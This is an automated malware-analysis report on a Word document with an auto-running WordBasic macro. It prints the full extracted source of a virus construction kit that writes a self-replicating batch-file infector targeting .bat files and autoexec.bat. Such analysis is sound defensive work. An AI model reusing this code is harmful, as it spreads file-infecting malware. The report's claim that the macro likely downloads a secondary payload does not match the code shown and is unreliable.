Verdict: MALICIOUS
Risk Score: 140

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing a WordBasic macro that executes automatically when the document is opened (AutoOpen). The macro shows the user a dialog box prompting for a virus name, an author string and an output path, then attempts to write a batch file, by default named 'c:\boot.bat', built from those inputs. This indicates a likely intent to download and execute a secondary payload or establish persistence.
Heuristics (4)
- ClamAV: Win.Tool.Macro-18 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Tool.Macro-18
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9290 bytes | 46d4eea5134c81f520ad67398a73905d05428b5190db1cbe58455dbb8d063a52 |

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
WordBasic.MsgBox "Mafia's Shit Creation Center v1.0b" + Chr(13) + _
" " + Chr(13) + _
" (c) by XaRaBaS [DkpRJ]", "MSCC v1.0b"
WordBasic.BeginDialog 400, 150, "MSCC v1.0b (c) XaRaBaS [DkpRJ]"
WordBasic.Text 10, 10, 300, 20, "Enter virus info and click OK"
WordBasic.Text 10, 40, 100, 50, "NaMe oF ThiS ShiT:"
WordBasic.TextBox 120, 40, 120, 17, "Ident$"
WordBasic.Text 10, 70, 100, 50, "Author:"
WordBasic.TextBox 120, 70, 120, 17, "Author$"
WordBasic.Text 10, 100, 100, 50, "TyPe HeRe ThE PaTh AnD ThE NaME Of ThE ViRuS:"
WordBasic.TextBox 120, 100, 240, 17, "Name$"
WordBasic.OKButton 270, 40, 90, 20
WordBasic.CancelButton 270, 70, 90, 20
WordBasic.EndDialog
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
dlg.Ident$ = "[DkpRJ]"
dlg.Author$ = "XaRaBaS 1999 [DkpRJ]"
dlg.Name$ = "c:\boot.bat"
On Error GoTo -1: On Error GoTo Clo
WordBasic.Dialog.UserDialog dlg
WordBasic.FileNew
WordBasic.Insert "@echo off %" + dlg.Ident$ + "%" + Chr(13) + Chr(10)
WordBasic.Insert "if -%1==-@ goto " + dlg.Ident$ + "z" + Chr(13) + Chr(10)
WordBasic.Insert "echo.>" + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "find " + Chr(34) + dlg.Ident$ + Chr(34) + _
"<%0>>" + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "for %%b in (*.bat) do call " + _
dlg.Ident$ + ".bat @ %%b" + Chr(13) + Chr(10)
WordBasic.Insert "del " + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "goto " + dlg.Ident$ + Chr(13) + Chr(10)
WordBasic.Insert ":" + dlg.Ident$ + "z [SBVM 0.02d]" + Chr(13) + Chr(10)
WordBasic.Insert "if -%2==-autoexec.bat goto " + dlg.Ident$ + _
Chr(13) + Chr(10)
WordBasic.Insert "find " + Chr(34) + dlg.Ident$ + Chr(34) + _
"<%2>nul" + Chr(13) + Chr(10)
WordBasic.Insert "if errorlevel 1 type " + dlg.Ident$ + _
".bat>>%2" + Chr(13) + Chr(10)
WordBasic.Insert ":" + dlg.Ident$ + " by " + dlg.Author$
WordBasic.FileSaveAs Name:=dlg.Name$, Format:=4
WordBasic.FileClose (2)
WordBasic.MsgBox "A NeW ViRuS WaS CreAtED!!" + Chr(13) + _
"ThAnKs FoR UsInG MaFiA's ShIt CoStRuCtIon KiT", "MSCC v1.0b"
Clo:
End Sub
' Processing file: /opt/analyzer/scan_staging/889ab833b59d48ff80c962cf2f6f2492.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoOpen - 4323 bytes
```